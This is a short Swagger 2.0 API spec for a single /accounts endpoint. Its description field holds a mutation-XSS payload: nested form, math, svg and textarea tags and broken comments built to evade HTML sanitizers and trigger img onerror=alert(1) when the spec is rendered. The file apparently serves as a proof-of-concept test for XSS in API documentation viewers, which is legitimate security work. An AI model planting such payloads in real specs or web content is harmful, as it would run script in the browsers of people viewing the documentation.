swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
            <form><math><mtext><!--<path id="--<a href="aes" sss </form><img/src/onerror=alert(1)></form><form><mglyph><svg><mtext><textarea><path id="--</textarea><a href="aes" sss </form><img/src/onerror=alert(1)>"><a href="aes" sss </form><img/src/onerror=alert(1)></form>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts